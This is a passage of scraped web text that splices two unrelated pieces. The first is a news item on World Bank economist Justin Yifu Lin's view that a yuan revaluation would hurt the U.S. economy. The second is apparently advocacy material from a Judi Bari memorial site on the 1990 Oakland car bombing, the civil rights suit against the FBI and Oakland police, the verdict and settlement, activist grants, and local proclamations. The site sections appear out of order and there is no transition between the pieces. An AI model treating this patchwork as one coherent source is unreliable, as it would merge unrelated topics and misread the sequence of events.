The chief economist for the World Bank said on Saturday that if China were to revalue its currency it would actually hurt rather than help the U.S. economy .
An employee poses with Chinese yuan notes inside a bank in Taipei April 23 , 2010 .
Calls for a stronger Chinese currency have been muted among finance leaders gathering for talks among the Group of 20 rich and developing nations .
REUTERS / Nicky Loh
Speaking to students on China ’s role in the future global economy , Justin Yifu Lin said critics who claim a purposely undervalued Chinese currency is a hampering U.S. growth are wrong .
He acknowledged that if China stopped selling renminbi and buying foreign currencies , the policy that critics say keeps the currency artificially undervalued , Chinese exports would become more expensive .
But he said because most of the products China exports to the United States are labor - intensive goods U.S. manufacturers stopped making years ago , the U.S. would only have two choices : buy the products from other countries or from the Chinese .
Either way , Lin said , the cost of those goods would rise for U.S. consumers and that would depress both consumer spending and job creation in the United States .
He argued that goods made in other parts of the developing world were more expensive than Chinese made goods because , if they were not , the United States would already be buying them .
Many economists -- including some from the World Bank ’s sister organization , the International Monetary Fund -- think revaluing the currency is just one of several steps China needs to take in order to shrink its massive reserves .
China would also need to adopt policies to encourage domestic consumption , such as improving health care and other social safety net services so that households would save less and spend more .
Economists have warned for years that China ’s large reserves , currently more than $ 2 trillion , and large deficits in countries such as the United States posed a threat to global economic stability .
Lin joined the World Bank , which provides financial and technical assistance to developing countries , in 2008 from the China Center for Economic Research at Peking University .
A Chinese national , he is the first non-Westerner to serve as the organization ’s top economist .
Lin said he was not worried that China ’s economy , which is expected to grow by double digits this year , was in any danger of overheating .
“ I think the Chinese government -- in general they have weekly meetings , monthly meetings , watching all signs of the macroeconomy -- and in the past , we see the Chinese government is able to do that kind of fine - tuning quite well . ”
FBI Seeks to Destroy Bomb Evidence
The motion is set for hearing Sept. 8 , 2010 , in Federal Court in San Francisco before Magistrate Judge James Larson .
A press conference follows the hearing and will be held in the plaza adjoining the San Francisco federal building at 450 Golden Gate Ave .
In a brazen move , the FBI , which never honestly investigated the evidence in the Judi Bari bombing , has given notice that they intend to destroy the remaining evidence in the still unsolved attempted murder .
Surviving plaintiff Darryl Cherney files an objection to the destruction of evidence and moves the court to order the FBI to preserve the evidence and either turn the it over to him for DNA testing and other forensic analysis , or to deliver it to a certified 3rd party for testing .
The FBI objects , saying it wants to destroy the evidence and claiming that the remains of two bombs are " contraband " which can not be released to a private individual .
Press Release
A jury awarded the two $ 4.4 million - in Bari 's case , to her estate .
Later , the parties settled for a total of $ 4 million , inclusive of attorney 's fees .
The parties also agreed that : ( 1 ) the FBI would return evidence to Oakland ; ( 2 ) Oakland would turn over evidence to Cherney ; ( 3 ) the parties would certify any disputes to the Court ; and 4 ) that May 24 , 1990 be proclaimed Judi Bari Day by the city of Oakland , which did , in fact , occur .
A letter taking credit for two bombings , including the bomb in Bari 's car , signed " The Lord 's Avenger , " provided details on the design of another bomb that barely went off at the Louisiana Pacific sawmill in Cloverdale , CA two weeks before the car bombing , as well as details of the car bomb .
The bomb in Cloverdale is nearly intact and could provide DNA and other forensic evidence that could identify the bomber .
The FBI , intent on framing Bari and Cherney , has never conducted a sincere investigation .
It has failed even to analyze lifted fingerprints or to do DNA forensics .
Cherney , however , has conducted his own investigation , collecting and analyzing evidence in pursuit of the bomber the FBI appears intent on hiding .
" There is a logging truck 's load of forensic evidence in this case , " said Cherney .
Bari ( posthumously ) and Cherney won a successful civil rights trial in 2002 , in which the jury agreed that their First and Fourth Amendment rights had been violated when the FBI and OPD falsely arrested them and illegally searched their homes -- all in order to discredit and silence them .
The events took place in a highly charged year .
A ballot initiative -- Forests Forever ( Proposition 130 ) on the November ballot -- would have banned clearcutting and preserved ancient forests among other proposed reforms .
It was defeated by just over one percentage point in a major setback .
The case stems from the FBI and Oakland Police attempts to pin a political bombing on the victims rather than look for the terrorist who tried to kill Judi Bari by hiding a motion - triggered pipe bomb under the driver 's seat of her Subaru station wagon .
The explosion interrupted Bari and Cherney 's musical roadshow in which they traveled to colleges to encourage people to participate in for the Redwood Summer campaign to stop the logging of ancient redwoods .
They had pulled out of Oakland just before noon , heading to UC Santa Cruz to perform on that fateful May 24 , 1990 when Bari 's car exploded on Park Blvd. near MacArthur .
Oakland police and FBI agents instantly declared Bari and Cherney the only suspects despite the fact that all of the physical evidence pointed at an assassination attempt and that they provided the FBI on the day of the bombing with a folder full of death threats targeting them .
Following the 20th anniversary of the 1990 car bombing and attempted frame up of Earth First !
organizers Judi Bari and Darryl Cherney , civil rights attorneys Dennis Cunningham and Ben Rosenfeld will argue a motion in San Francisco Federal Court , 450 Golden Gate at 9:30 am this Wednesday , Sept. 8 in Courtroom F , 15th Floor before Judge James Larson , to prevent the FBI from destroying two sets of bomb remnants .
The motion asks that those remnants and other evidence to be turned over to Cherney or an agreed upon laboratory for DNA and other forensic testing to determine the identity of the bomber .
A press conference on the plaza outside the Federal Building will follow the hearing .
Jury 's message to feds in $ 4.4 million verdict for Judi Bari and Darryl Cherney
( revised 6/19/02 )
Please click here to continue reading this article , with more interpretation of the meaning and importance of the verdict by the media as well as by individual participants and observers , including one of the jurors .
Lead attorney Dennis Cunningham said the message he hopes the verdict sends is that : " Ashcroft is doing precisely the wrong thing to abandon the ( Levi ) guidelines and let the FBI go after dissent with a free hand .
It 's clear that their intention is not about fighting terrorism , it 's about suppressing dissent .
That 's what the FBI has always been about .
Hopefully it will make Congress think twice about giving them a free hand . "
" It 's really beyond our wildest dreams , " said Darlene Comingore , Judi Bari 's friend and executor of her estate who stood in for her as co-plaintiff in this suit .
" We hope the FBI and Oakland and all the police forces out there that think they can violate people 's rights and get away with it are listening because the people of the state of California and Oakland today said , ' No , you can 't .
You ca n't get away with it . ' "
" The jury exonerated us , " said Darryl Cherney .
" They found the FBI to be the ones in violation of the law .
The American public needs to understand that the FBI can't be trusted .
Ten jurors got a good , hard look at the FBI and they did n't like what they saw . "
The jury unanimously found that six of the seven FBI and OPD defendants tried to frame Judi and Darryl in an effort to crush Earth First ! and chill participation in Redwood Summer .
That was evident in the fact that 80 % of the $ 4.4 million total damage award was for violation of their First Amendment rights to speak out and organize politically in defense of the forests .
On June 11 , 2002 , a federal jury returned a stunning verdict in favor of Judi Bari and Darryl Cherney in their landmark civil rights lawsuit against four FBI agents and three Oakland Police officers .
To search this website , type in the box one or more words that must appear on the page you 're looking for and then click on the Google Search button .
The Albion Nation has had a special affinity for Judi since she answered the community 's call for help in 1992 when Louisiana Pacific Corporation began logging the redwood forest next to the estuary of the Albion River at a place called the Enchanted Meadow .
Judi helped the community stage two months of nonviolent protests to slow the logging and call public attention to it .
Tactics included over a dozen treesits , locking down to logging road gates and equipment and blocking bulldozers .
After two months , an appeals court order shut down the logging as unlawful , validating the community effort to stop it .
The award - winning documentary The Forest For The Trees was shown for the first time on the Mendocino Coast .
The film focused on the trial in Judi's 12 year lawsuit against the FBI and Oakland Police to clear her name of false charges of knowingly carrying a bomb that nearly killed her when it exploded under her driver 's seat .
Judi's close friend Alicia Littletree was there to sing a few songs and start a round of spontaneous story telling about Judi .
One person drove all the way from the San Francisco Bay area for the event , and drove four hours back afterwards to go to work the next morning .
There were displays of photos , banners and other memorabilia of Judi and the Enchanted Meadow uprising .
The evening concluded with a showing of Kay Rudin 's video tribute Viva Judi Bari .
About 60 people attended the event at the Albion School , a good turnout for a rural area with a small and widely scattered population , and many competing events scheduled the same night .
March 2 , 2007 was the tenth anniversary of Judi Bari 's passing on March 2 , 1997 .
There was a memorial gathering in Albion CA to mark the date and honor Judi 's memory .
Despite the injuries that left Judi crippled for life , the pair filed a federal civil rights lawsuit to defend themselves and their movement against unlawful governmental interference with their First Amendment right to organize politically in defense of the forests .
Five years after Judi 's untimely death , a federal jury vindicated her and Darryl , awarding them an unprecedented $ 4.4 million from the FBI and OPD , with fully 80 % of the damage award for First Amendment violations and the rest for false arrest and unlawful search and seizure .
For nearly two months after the bomb attack , the FBI and Oakland police subjected Judi , Darryl and the Earth First !
movement to a calculated media smear campaign intended to discredit them and neutralize their logging reform work .
Eventually the prosecutor announced no criminal charges would be filed against them because there was no evidence they were guilty .
Neither the FBI nor OPD ever pursued numerous clues or made any genuine effort to catch the real bomber , but continued to tell media that Judi and Darryl were their only suspects .
Earth First !
leader Judi Bari was nearly killed on May 24 , 1990 , when a motion - triggered bomb hidden under the driver 's seat exploded under her in Oakland .
Judi and Darryl Cherney , also an Earth First !
organizer , were traveling to promote Redwood Summer , a nonviolent campaign to defend the redwood forests from corporate liquidation logging .
Judi had received death threats from timber industry supporters , and had reported them to police .
But even as Judi was undergoing emergency surgery for her horrific bomb injuries , the Oakland Police , at the instigation of the FBI , arrested the pair , falsely charging that they were terrorists who were knowingly carrying explosives .
It was a deliberate frame - up , as a federal jury would find twelve years later .
The Redwood Justice Fund and the Willits Environmental Center are proud to honor the memory of Judi Bari and encourage the work of these two exceptional women , Naomi Wagner and Lindsey Holm , by awarding these grants .
The public is invited to attend the Saturday , June 16 celebration .
Twenty - two year old Lindsey Holm was born and raised in northern Humboldt County .
Her childhood in the woods led her to become an expert amateur mycologist , which in turn propelled her into defending the old - growth forests of her region .
Lindsey was among a group of tree - sitters attempting to save the ancient redwoods of Freshwater Creek near Eureka .
When she and others were forcibly extracted from the trees and arrested , she taught herself the law , defended their actions in court , and , without lawyers , won a settlement agreement .
Lindsey has become skilled in reviewing Timber Harvest Plans , becoming familiar with the specialties of hydrology , geology and forestry as well as the statutory and regulatory aspects of logging plans .
She has recently learned GIS and mapping techniques , and is about to embark on a year - long walk through the redwood bioregion guiding professional photographers to document the condition of this still - threatened ecosystem .
Lindsey has demonstrated a voracious intellect , a matching appetite for hard work and a fierce drive to see justice done .
And she ’s just getting started !
For two decades , Naomi Wagner has devoted her life to forest protection .
In 1987 she walked into the Mendocino Environment Center seeking help to organize her neighborhood to fight abusive logging practices in the mountains west of Willits .
She taught herself how to interpret official Timber Harvest Plan documents and learned how the public could influence them .
Naomi enthusiastically joined Judi Bari and others working to reform abusive logging practices .
Already a grandmother , Naomi became active in Earth First ! , organizing and participating in nonviolent direct actions .
The list of her involvement in forest defense reads like a history of the movement .
She has been arrested , spent time in jail and endured a prolonged fast as expressions of her commitment to end non-sustainable logging practices on the North Coast .
With her commitment to nonviolence and her rich experience in direct action , Naomi has trained a new generation of activists in the principles of effective action .
Asked her reaction to receiving the grant , Naomi said , " I feel very honored for the recognition , but I 'm also very aware of the hundreds and actually thousands of others who share the honor because we walk in Judi Bari 's footsteps in working together to defend the forest against the corporations . "
Naomi Wagner and Lindsey Holm , each in their unique ways , embody the spirit and passion that Judi Bari brought to environmental work .
From 1988 until her death from breast cancer in 1997 , Judi was a potent and charismatic force in the growing movement to stop the corporate liquidation logging of the redwood forests of Mendocino and Humboldt Counties .
Judi was also the first forest activist to reach out to the loggers and mill workers in an effort to form an alliance with environmentalists to promote logging practices that would be sustainable for generations to come .
A Willits resident , Judi was known and admired for her courage in facing hostility and danger , her boisterous sense of humor , her electrifying speaking style , and her powerful intellect .
The Judi Bari Activist Grants are awarded biennially by the Redwood Justice Fund in collaboration with the Willits Environmental Center .
The grants are funded from a portion of the damages awarded to the estate of Judi Bari in 2002 , when a jury delivered a stunning verdict against the FBI and the Oakland Police Department in favor of Bari and Darryl Cherney .
It was the culmination of an historic 11 year civil rights case .
Naomi Wagner and Lindsey Holm will be the first recipients of the new Judi Bari Activist Grant , according to a May 29 , 2007 , news release from Ellen Drell of the Willits Environmental Center .
Each of the two will be awarded $ 5000 in recognition of her exceptional courage and commitment to protecting the forests of northwest California .
The public is invited to an awards celebration Saturday , June 16 , from 6 - 8 pm , at the Willits Environmental Center ( WEC ) , 630 S. Main Street in Willits , California .
( New location )
Cosponsors of these events include Earth First ! , the Industrial Workers of the World ( IWW ) and the Bay Area Coalition for Headwaters ( BACH ) .
Marking the moment :
To mark the moment of the late morning bomb explosion , people from near and far gathered at 11:30 am at the Oakland site where the bomb blasted through Judi's car , nearly killing her and forever changing the Earth First ! movement .
The site is in front of Oakland High School , on Park Blvd near East 33rd .
There was music and a speak - out .
Revolutionary Ecology : a commemoration and a celebration of revolutionary resistance and movement solidarity La Peña Cultural Center ( 3105 Shattuck , Berkeley ) Speakers include Ramona Africa , from Move in Philadelphia , Dennis Cunningham , lead attorney in the Judi Bari vs FBI case , and climate justice activist Gopal Dayeneni Live music featured Darryl Cherney , Mokai , Alicia Littletree , K. Rudin , Gary Ball and others
The event included a film tribute to Judi , exciting historical exhibit and much more .
Redwood Summer , 1990 , was a mass mobilization of students and others from across the United States to protest the deforestation of the redwood region in Northern California , which was being decimated by the corporate chain saw .
The mobilization was modeled after Mississippi Summer , a major organizing effort in the nation 's civil rights movement in the South in the 1960s .
A key architect and organizer of Redwood Summer was labor and environmental leader Judi Bari .
The bomb which nearly killed her was preceded and followed by a smear campaign against Earth First ! , carried out by the FBI , which tried to charge Darryl and Judi for the bombing , and tried to brand the deep ecology group Earth First ! as a terrorist organization .
That explosion , and the subsequent attack on Earth First ! as well as Judi and Darryl by the FBI and Oakland police , would forever change the face of forest activism in the redwoods and elsewhere .
The bomber was never found , because the FBI never conducted a serious investigation , choosing instead to blame and harass Earth First ! activists .
But a lawsuit filed by Judi against the FBI for violation of Constitutional rights was ultimately successful in 2002 , vindicating Darryl and Judi , but coming five years after Judi 's untimely death from breast cancer at the age of 47 .
Twenty years ago on May 24 , 1990 , a bomb planted in the car of Earth First !
activist Judi Bari exploded , sending her and fellow activist Darryl Cherney to the hospital in Oakland -- Judi with life - threatening injuries , since the bomb had been hidden directly under her driver 's seat .
Judi and Darryl were on their way to a music and speaking event on the UC Santa Cruz campus , part of an organizing tour for Redwood Summer .
The 20th anniversary of the pipe bomb attack on Judi Bari , Darryl Cherney and Earth First ! on May 24 , 1990 was recognized in events in the San Francisco Bay Area over the course of two days
We hope you 'll enjoy this website , bookmark this home page , and come back often to see what 's new .
Please scroll down and continue exploring this website .
( Note : You can click here for a separate page with just the Brief History for ease in printing it out . )
In the left column of this page you 'll find the latest information about the case , including the verdict form completed by the jury which details the verdict and damage awards .
The evidence was presented in a jury trial that began on April 8 , 2002 , and ended June 11 with a stunning vindication of Judi and Darryl , and a $ 4.4 million award of damages .
A full 80 % of the damages were for First Amendment violations , showing that the jury understood that the motivation for the false arrest and illegal searches was to interfere with Judi and Darryl 's political activism with Earth First ! in defense of the redwoods .
The lawsuit was delayed from coming to trial for nearly 11 years by defense motions and appeals intended to wear the plaintiffs down and prevent the case from ever coming to trial .
They gained an immense advantage when Judi died in 1997 , but Judi 's estate , Darryl Cherney , their legal team and supporters have have kept the suit alive and have cleared every hurdle and won every appeal .
The courts ruled several times prior to trial that there is substantial evidence to support the charges .
To this day the FBI has never retracted the false charges or apologized .
The FBI 's sustained propaganda campaign against Judi , Darryl and Earth First !
succeeded in fooling some people into believing they were bomb - using extremists .
Fully 12 years after the event the bomber or bombers are still free because , as overwhelming evidence has shown at trial , instead of mounting a genuine investigation of the bombing , the FBI and OPD :
“ This case is not just about me or Darryl or Earth First ! , ” Judi said .
“ This case is about the rights of all political activists to engage in dissent without having to fear the government 's secret police . ”
A year after the bombing , when it was clear that the FBI and OPD were making no genuine effort to solve the bombing , Judi and Darryl filed a federal civil rights suit against the FBI and OPD .
The suit claims false arrest and unlawful search in violation of the Fourth Amendment to the U.S. Constitution .
It also claims a politically - motivated conspiracy in violation of the First Amendment which attempted to suppress and chill their free speech by discrediting them in public perception as violent extremists .
The FBI then used the pretext of investigating the bombing as cover for a nationwide investigation of Earth First ! , sending agents to create dossiers on over 500 people whose only crime was to have received a long - distance phone call from Judi , Darryl , or one of 14 other people associated with them .
But after delaying arraignment for seven weeks , when it was finally time for the District Attorney to present evidence in court and file formal charges , the FBI and Oakland Police did n't actually have any .
The D.A. announced he would not file charges , citing the lack of evidence .
The Oakland Police closed their " investigation , " but the FBI continued theirs , telling the media that Judi and Darryl were their only suspects .
It was a deliberate , politically motivated effort to target and " neutralize " Judi , Darryl and Earth First ! , and to discourage people from traveling from all over the nation to join in Redwood Summer .
The sensational false charges made headlines nationwide , and the FBI and their Oakland Police accomplices kept a two - month media smear campaign going with a series of false claims about physical evidence linking Judi to building the bomb .
But instead of investigating the bombing as attempted murder , as the evidence clearly showed , the FBI , with the willing collaboration of the Oakland Police , tried to frame Judi and Darryl for the bombing , further victimizing them by false arrest and accusing them of knowingly transporting the bomb that nearly killed them .
Judi was maimed and disabled by the bombing , while Darryl received lesser injuries .
In the previous two months , both had received numerous death threats from timber industry supporters and had reported them to local police .
They had copies of written death threats in the car , where investigators found them .
Right away , Judi and Darryl told paramedics and police officers that they had been bombed because of their activism against the timber industry , and both of them separately named the same individuals and a right - wing group that they believed were behind the bombing .
Judi Bari was nearly killed in a still - unsolved terrorist attack on May 24 , 1990 , when a motion - triggered pipe bomb wrapped with nails exploded directly under her driver 's seat .
She and Darryl Cherney were driving through Oakland , California when the bomb exploded .
They were on a concert and speaking tour to recruit college students for Redwood Summer , a campaign of nonviolent mass protests against corporate liquidation logging .
This website is dedicated to Judi Bari .
Judi was a renowned environmental , labor and social justice leader .
She organized nonviolent protests against destructive corporate logging of the redwood forests .
She died of breast cancer on March 2 , 1997 .
October 15 , 2006 ( posted 11/10/06 )
The Redwood Justice Fund and the Willits Environmental Center are pleased to announce the establishment of the “ Judi Bari Activist Grant . ”
This $ 5,000 cash grant will be awarded biannually to a North Coast environmental activist working on the front lines in the “ Judi Bari ” tradition .
It is intended to allow the recipient to continue working on behalf of the environment , and to encourage activists to follow in Judi ’s footsteps .
The first grant will be awarded in May , 2007 .
We are currently soliciting nominations from environmental groups and organizations throughout the North Coast .
Nominees should be individuals who embody the qualities we so admired in Judi , and will be evaluated based on the presence of those qualities , as well as financial need .
Read the full announcement letter with details about grant applications .
( 53 KB PDF file , Acrobat Reader required )
This site is back online on a new hosting service ( posted 8/25/06 )
The site was down for over a week due to a problem with our hosting company .
After trying unsuccessfully for a week to correct the problem , we took the drastic measure of switching to a new hosting service .
We have restored the complete site as it was before it went down .
Unfortunately , Google tried to crawl the site while it was unavailable , so now our Google - powered site search finds nothing .
It will be functional again after the next site crawl , which we hope to expedite by sending Google a complete sitemap .
If you find any other site features not working , or broken links , please send email to webmaster at judibari.org so we can try to fix any remaining problems .
( We do n't provide a complete email address here in an effort to avoid spam robots picking it up and clogging our mailbox with amazing enlargement offers . )
Judi Bari interviewed on Radio Curious ( posted 5/24/06 )
In this half - hour Radio Curious interview by Barry Vogel , Judi gives a brilliant analysis of how Texas corporate raider Charles Hurwitz took over Pacific Lumber with the help of junk - bond king and convicted felon Michael Milken .
Judi tells how Hurwitz then began liquidating the largest remaining unprotected old - growth redwood stands in the world while using financial trickery to line his own pockets to the tune of hundreds of millions of dollars .
Read more and listen to the interview from our Audio page .
Listen to BBC Radio's documentary : " Do n't Mourn , Organize : The Judi Bari Story "
BBC Radio broadcast a half - hour Judi Bari documentary in December 2004 .
The program can now be streamed or downloaded from our Audio page .
Legal Team Wins Q- Tip Pepper Spray Torture Suit ( 5/14/05 )
The brilliant Bari / Cherney legal team took on and won the federal civil rights suit brought by non-violent Headwaters Forest protesters who had pepper spray soaked Q - tips put into their eyes by Humboldt County sheriff 's deputies in 1997 .
You may remember the shocking police videos that drew international outrage and condemnation when they were broadcast by network TV .
The forest activists sued in federal court for violation of their 4th Amendment rights by excessive force .
There was an evenly split jury in their 1998 San Francisco federal court trial , in which they were represented by a different legal team .
Instead of setting a new trial , the judge threw the case out , ruling that no reasonable juror could find that excessive force was used , even though half of the jurors had decided exactly that .
The activists appealed , and the 9th Circuit strongly overturned the trial judge and granted a new trial .
Defendants then appealed to the U.S. Supreme Court , which upheld the 9th Circuit decision .
Soon after the Bari / Cherney legal team took on the case , they blocked an attempt by the judge to move the second trial to Eureka , and they got the judge removed from the case for the appearance of bias in his actions .
The second trial in September 2004 in San Francisco ended in another hung jury , this time split 6 - 2 in favor of the plaintiffs .
The third trial in April 2005 ended in a unanimous jury verdict for the eight plaintiffs , finding that Humboldt officers had used unconstitutional excessive force .
For much more information about that case , Lundberg vs. County of Humboldt , see the No Pepper Spray website ( link opens in a new window , close to return here )
Judi Bari Smeared in Right - Wing Book ( posted 1.28.05 , revised 5/14/05 ) )
The Secret Wars of Judi Bari : A Car Bomb , The Fight for the Redwoods , and the End of Earth First ! by Berkeley freelance writer Kate Coleman is a paid - for hatchet - job .
The sham biography was published in January 2005 by Encounter Books , a non-profit " conservative " publisher which serves as the propaganda publishing arm of the ultra - right - wing Lynde and Harry Bradley Foundation .
The book , filled with literally hundreds of lies and factual errors , is an effort to discredit Judi posthumously because she is a progressive role model , a strong woman who stood up to corporate power .
Encounter Books has also published smear books on Hillary Clinton and Noam Chomsky , as well as books lauding right - wing heroes like Supreme Court Justice Clarence Thomas and McCarthy era anti-communist icon Bishop Fulton J. Sheen .
Before starting Encounter books , the Bradley Foundation directly funded hundreds of right - wing books , including the original trash - for - cash smear book , The Real Anita Hill by David Brock , who has since had a change of heart and confessed that the book was almost entirely false and that he was hired and paid to write it .
Like Brock , Kate Coleman has publicly admitted that she was recruited and paid to write her book , in which she attempts to discredit Judi , Earth First ! and the whole radical environmental movement .
Although she pretends to be a progressive and cites her participation in Berkeley 's Free Speech Movement of the early 1960s , Coleman 's more recent track record includes articles smearing Black Panther party leaders in right - wing publications put out by David Horowitz , the well - known former leftist turned hard - right propagandist , editor and TV pundit .
Coleman was hired to write this attack book on the basis of an article she wrote for the Anderson Valley Advertiser , a paper whose then - editor , Bruce Anderson , carried on a famous print vendetta against Judi ever since she quit writing for his paper in 1993 and denounced him as a sexist bully .
Secret Wars is Coleman 's first effort at writing a book .
Judging from the book it should also be her last .
Some of Judi 's friends and family have looked at Coleman 's book and put together a list of over 350 factual errors and outright lies it contains , nearly two for every page of text .
For a detailed rebuttal of the book and to see the lie list , please visit www.colemanhoax.info ( opens in a new window ) .
A new support group , Friends of Judi Bari ( FOJB ) , has been formed specifically to defend Judi from this kind of malicious smear attack .
You can learn more at the FOJB website , www.fojb.org ( opens in a new window ) .
Darlene Comingore , executor of the estate of Judi Bari , sent a letter to Encounter Books asking that they withdraw Coleman 's book until the hundreds of errors it contains have been corrected .
The text of the letter is below .
Update : As of May 2006 , Encounter Books has relocated to New York City , and Collier has been replaced by a new publisher .
Encounter has not withdrawn Coleman 's book , but there has been no visible promotion for it in nearly a year , and the book seems to have died a richly deserved death .
The book 's Amazon sales rank on 5/10/06 stood at 587,852 despite a recent price cut .
That means 587,851 other titles are selling better , making the Coleman book one of the worst sellers .
As of June 7 , 2007 the book 's sales rank had slipped to a new record low at 873,824th place among books sold by Amazon .
Estate of Judi Bari January 25 , 2005 Peter Collier , Publisher
Encounter Books
665 Third Street , Suite 330
San Francisco , CA 94107-1951
RE : Request for withdrawal of " The Secret Wars of Judi Bari "
Dear Mr. Collier :
Regardless of political allegiances , it is sometimes possible for people of differing persuasions to agree that something just is n’t true .
Although you run an ideologically - based publishing house , I trust that you have the intellectual integrity to want to avoid knowingly printing false information under the guise of non-fiction .
Any book can have a few mistakes .
But Encounter Books ’ recent title , " The Secret Wars of Judi Bari , " seems to have broken some kind of record .
A page - by - page listing of its factual errors and false assertions has reached 351 entries , and the book is only 232 pages long .
These errors range from small ones­like the constant misplacing of people , dates and events­on up to serious libels , like the claim that Bari abandoned environmental activism and instead promoted her image as a martyr in order to benefit financially .
You may quarrel with some of the listings , but most are indisputable .
Fifteen key errors are refuted with on - line documentation , and many more will be included in the " Instant Proof " section as additional documents are assembled .
As someone who was a friend , political colleague , and ally with Judi from 1979 to the day of her death in 1997 , the portrait painted in this book is not one that I recognize .
Please do n't take my word for this .
In his LA Times review of your book published January 25 , 2005 , Mr. Mark Hertsgaard writes , " ‘ The Secret Wars of Judi Bari ’ could be assigned in journalism schools to teach how not to do investigative reporting . "
As a person who Judi named to protect her interests , Ms. Coleman neither contacted me nor to my knowledge attempted to contact me to verify any assertions she presented in her book .
A book can't claim to be a biography with this level of error , whether it is deliberate or just the consequence of a lazy author or incompetent fact - checkers .
That does n't mean that Judi Bari is above criticism .
But everyone­dead or alive­is entitled to a certain base - line honesty in the telling of the story of his or her life .
For these reasons , the Estate of Judi Bari requests that you withdraw " The Secret Wars of Judi Bari " from publication until it can be corrected .
The extensive critique that has been posted by her family , friends and associates at www.colemanhoax.info should be helpful .
I look forward to hearing from you .
You may contact me by phone at -------- , by email at ---------, or in writing in care of my attorney Mr. Daryl J. Weinroth , Esq. , 750 Grant Avenue , Suite 250 , Novato , CA 94947 .
Very truly yours , Darlene G. Comingore
Executor
FBI and Oakland Police Pay Earth First !
$ 4 Million to Conclude Lawsuit , Avoid Appeals
Unanimous 2002 Jury Verdict Remains Intact for Violation of Constitutional Rights Press Release , May 13 , 2004 from Darryl Cherney
A fourteen - year saga ended on Friday , May 7 , as the FBI joined the City of Oakland in paying Earth First !
activists Darryl Cherney and the late Judi Bari through her estate a combined $ 4 million for violations of their first and fourth amendment rights as guaranteed by the U.S. Constitution .
The lawsuit stemmed from a May 24 , 1990 car bombing of the pair .
The FBI and Oakland police instantly blamed Bari and Cherney for bombing themselves even though they had conducted no investigation and all evidence collected showed they were the victims of an assassination attempt .
A ten-person jury in Judge Claudia Wilken 's Federal District Courtroom in Oakland originally awarded Bari and Cherney $ 4.4 million , but a post - trial contractual agreement was engineered to avoid appeals by both sides .
Attorney Dennis Cunningham led the legal team of Bob Bloom , Tony Serra , William Simpich and Ben Rosenfeld , all of the SF bay area .
Fee attorney James Wheaton of the First Amendment Project joined post - trial efforts to draft a fee motion , which if it prevailed , could have doubled the amount the defendants would have had to pay , setting legal precedents the FBI wanted to avoid and Oakland could not afford .
Numerous other post trial motions and pending appeals were all dropped by all sides to conclude the case .
But when the dust cleared , the jury verdict remained in place .
For one of the only too rare times in history , the citizens of the United States scored a victory for civil rights over the scandal plagued , notorious Federal Bureau of Investigation .
Alicia Littletree , who lived with Judi Bari and was considered to be her protégé , was dubbed the " Most Valuable Paralegal " by all involved .
" Our lawyers were the only legal team that could have pulled this off .
They were geniuses , " she said .
When asked how Judi might react to the victory , Littletree said , " Judi would n't have gotten over the feeling that the bombing is not solved .
That is a lingering part of the fight .
Judi would n't give up just because the money came in . "
She added about the settlement , " It 's an easy way out for the FBI . "
Cherney vowed to continue the investigation of the bombing .
Included in the post - trial victory settlement , Cherney achieved the return of all evidence in the case .
He was also able to convince the Oakland City Council to proclaim May 24 to be " Judi Bari Day . " Plans are still being formulated for victory celebrations up and down the coast of California .
Cherney said that no individual involved with this case would net more than $ 500 thousand dollars .
When asked how he will spend the funds , he replied , " Acquire a modest home , help fund a continued investigation of the bombing , donate to worthy groups , and channel energy into producing CD's of eco-music . "
Cherney and Bari were bombed on their way to a musical performance that doubled as an organizing drive for a campaign called Redwood Summer 1990 .
Bari played fiddle , Cherney guitar , and they both sang and wrote songs .
Attorney Bob Bloom said , " If we get a few more victories like this , it might affect what the FBI , the domestic army of the United States , does to people . "
Cherney added , " In the wake of 9/11 and Bush 's assault on our civil rights , our trial victory is more urgent then ever .
We the people will not stand for the FBI or any government agency clearcutting the constitution .
May a thousand lawsuits bloom from this one to hold the FBI accountable for their too - many - to - count violations of the laws they are supposed to uphold . "
City of Arcata Proclaims November 7th Judi Bari Day ( 11.5.03 )
The mayor and city council of Arcata , California this week proclaimed November 7th as the city 's annual Judi Bari Day , honoring the late environmental and social justice activist on her birthday .
Arcata Mayor Bob Ornelas , in an interview on KMUD News this evening , said he had long admired Bari and was happy to sign the proclamation honoring her .
" Judi Bari really was a special person -- very effective , " Ornelas said .
" She came from a labor background .
She understood the challenge of trying to work in the woods and leave it in a better condition then when you got there . "
Ornelas said Bari and Cherney " really brought redwoods to the forefront [ of public awareness ] with Redwood Summer and those kinds of activities . "
The mayor added that support for the Judi Bari Day proclamation by the council was unanimous .
" I 'm not aware of any level of protest in the community -- well maybe later in the week by some of the right - wing radio stations . "
Arcata , on Humboldt Bay a few miles north of Eureka , is home to Humboldt State University .
Humboldt County 's economy has for over a century been dominated by the redwood logging industry , and is still the scene of heated controversy over the continued logging of the few old - growth redwood forests left in the world by Maxxam Corporation - owned Pacific Lumber Company .
Arcata joins the City of Oakland , California in designating an annual Judi Bari day .
Acting earlier this year , Oakland chose to honor Bari on May 24 , the date she was severely injured by a car bomb explosion under her seat in 1990 as she drove through that city while organizing an environmental campaign .
Bari died on March 2 , 1997 of breast cancer at the age of 47 .
Last year a federal jury found several FBI agents and Oakland police officers liable for $ 4.4 million for violating the First and Fourth Amendment rights of Bari and fellow Earth First !
activist Darryl Cherney by falsely arresting them for the bombing , unlawfully searching their property , and conducting a media smear campaign aimed at destroying their credibility and effectiveness as environmental and political organizers .
Negotiations have been under way for months in an effort to work out a post - trial settlement that would avoid the additional expense and delay of appeals by both sides in the federal case .
The text of the Arcata proclamation follows : Proclamation Declaring November 7th
Judi Bari Day Whereas , November 7th is the birthday of Judi Bari , a dedicated activist , who worked for many social and environmental causes , the most prominent being the protection and stewardship of California 's ancient redwood forests ; and Whereas , examples of Judi Bari 's efforts include the preservation of the Headwaters Forest in Humboldt country , the protection of the Cahto Wilderness and the Albion River Watershed in Mendocino County ; and Whereas , prominent environmental activist David Brower stated on the occasion of her untimely death on March 2 , 1997 from cancer at the age of 47 , " Judi always projected an unwavering commitment to her values and her continued urgings to affect apathy into action .
We will miss her commitment and compassion , her strength , courage and conviction .
We can honor her by sharing it . "
Now , therefore , the City of Arcata hereby designates November 7th as Judi Bari Day and celebrates and honors the work of Judi Bari in advancing the causes of forest protection , labor organizing , bridge building between environmentalists and timber workers , and civil rights for political activists ; and Be it further proclaimed that the City shall encourage its schools , civic institutions and citizens to memorialize Judi Bari 's work through art ,
media , festivals , school assignments and other creative means .
Dated : November 5 , 2003
( Signed ) Robert J. Ornelas , Mayor
Legal Team wins Top National Lawyers Award ! ( 7/30/03 )
